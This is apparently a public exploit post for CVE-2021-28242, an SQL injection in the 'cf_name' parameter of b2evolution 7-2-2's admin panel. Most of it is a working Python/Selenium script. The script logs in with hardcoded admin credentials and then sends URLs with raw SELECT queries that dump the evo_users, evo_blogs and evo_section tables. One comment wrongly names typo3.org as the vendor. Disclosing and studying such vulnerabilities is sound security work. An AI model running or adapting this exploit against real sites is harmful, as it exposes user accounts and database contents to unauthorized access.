# Exploit Title: b2evolution 7-2-2 obtaining sensitive database information by injecting SQL commands into the "cf_name" parameter # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 05.06.2021 # Vendor: https://b2evolution.net/ # Link: https://b2evolution.net/downloads/7-2-2 # CVE: CVE-2021-28242 # Proof: https://streamable.com/x51kso [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28242 from selenium import webdriver import time # Vendor: https://typo3.org/ website_link=" http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link " # enter your login username username="admin" # enter your login password password="FvsDq7fmHvWF" #enter the element for username input field element_for_username="x" #enter the element for password input field element_for_password="q" #enter the element for submit button element_for_submit="login_action[login]" browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit vulnerability MySQL obtain sensitive database information by injecting SQL commands into the "cf_name" parameter time.sleep(7) # Receaving sensitive info for evo_users browser.get((" http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections ")) time.sleep(7) # Receaving sensitive info for evo_blogs browser.get((" http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections ")) time.sleep(7) # Receaving sensitive info for evo_section browser.get((" http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")) time.sleep(7) browser.close() print("At the time, of the exploit, you had to see information about the tables...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Sorry, your exploit is not working for some reasons...") --------------------------------- # Exploit Title: b2evolution 7-2-2 obtaining sensitive database information by injecting SQL commands into the "cf_name" parameter # Date: 05.06.2021 # Exploit Authotr idea: @nu11secur1ty # Exploit Debugging: @nu11secur1ty # Vendor Homepage: https://b2evolution.net/ # Software Link: https://b2evolution.net/downloads/7-2-2 # Steps to Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-28242 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>